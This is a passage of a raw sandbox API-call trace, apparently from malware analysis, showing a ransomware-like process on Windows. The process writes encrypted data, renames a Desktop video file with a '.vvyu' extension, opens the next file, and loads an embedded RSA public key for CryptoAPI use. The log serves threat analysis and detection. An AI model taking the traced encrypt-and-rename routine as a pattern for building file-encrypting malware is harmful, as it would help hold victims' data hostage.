(in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8d0 | out: hHeap=0x6a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8b8 | out: hHeap=0x6a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e918 | out: hHeap=0x6a0000) returned 1 [0184.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.139] GetCurrentThreadId () returned 0x264 [0184.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d367a8 [0184.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.140] GetCurrentThreadId () returned 0x264 [0184.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82c70 [0184.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e918 [0184.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8b8 [0184.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0184.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8d0 [0184.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8a0 [0184.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e930 [0184.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0184.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e900 [0184.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8e8 [0184.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e948 [0184.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8e8 | out: hHeap=0x6a0000) returned 1 [0184.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8e8 [0184.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e900 | out: hHeap=0x6a0000) returned 1 [0184.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0184.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8b8 | out: hHeap=0x6a0000) returned 1 [0184.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8b8 [0184.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e918 | out: hHeap=0x6a0000) returned 1 [0184.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e948 | out: hHeap=0x6a0000) returned 1 [0184.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0184.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0184.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8b8 | out: hHeap=0x6a0000) returned 1 [0184.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0184.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0184.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8e8 | out: hHeap=0x6a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e930 | out: hHeap=0x6a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8d0 | out: hHeap=0x6a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8a0 | out: hHeap=0x6a0000) returned 1 [0184.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e888 | out: hHeap=0x6a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31258 | out: hHeap=0x6a0000) returned 1 [0184.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0184.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.151] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x15737, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x15737, lpOverlapped=0x0) returned 1 [0184.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.153] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1573c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.153] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0184.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.154] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.155] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.155] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.155] CloseHandle (hObject=0x584) returned 1 [0184.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0184.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d41908 [0184.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0184.157] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\xC6Y6diW-2mP3g1eZ.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\xc6y6diw-2mp3g1ez.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\xC6Y6diW-2mP3g1eZ.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\xc6y6diw-2mp3g1ez.mkv.vvyu")) returned 1 [0184.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.160] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0184.163] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9163430, ftCreationTime.dwHighDateTime=0x1d8a636, ftLastAccessTime.dwLowDateTime=0xf5dbb360, ftLastAccessTime.dwHighDateTime=0x1d8a68f, ftLastWriteTime.dwLowDateTime=0xf5dbb360, ftLastWriteTime.dwHighDateTime=0x1d8a68f, nFileSizeHigh=0x0, nFileSizeLow=0x17705, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xf-vHBag-ZJttfI79F6Z.bmp", cAlternateFileName="XF-VHB~1.BMP")) returned 1 [0184.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31258 [0184.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0184.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31258 | out: hHeap=0x6a0000) returned 1 [0184.163] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\xf-vHBag-ZJttfI79F6Z.bmp") returned=".bmp" [0184.163] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\xf-vHBag-ZJttfI79F6Z.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\xf-vhbag-zjttfi79f6z.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.163] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=96005) returned 1 [0184.164] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.166] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x176df, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.166] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.168] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.168] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x17705, lpOverlapped=0x0) returned 1 [0184.169] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.170] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.170] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.170] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.170] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.171] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.171] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.171] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.171] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.171] GetLastError () returned 0x0 [0184.171] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.171] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.171] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.172] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.172] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x17710) returned 0x2d43778 [0184.172] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31258 [0184.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e888 [0184.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d312a0 [0184.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8a0 [0184.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8d0 [0184.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e930 [0184.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8e8 [0184.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.173] RtlAllocateHeap 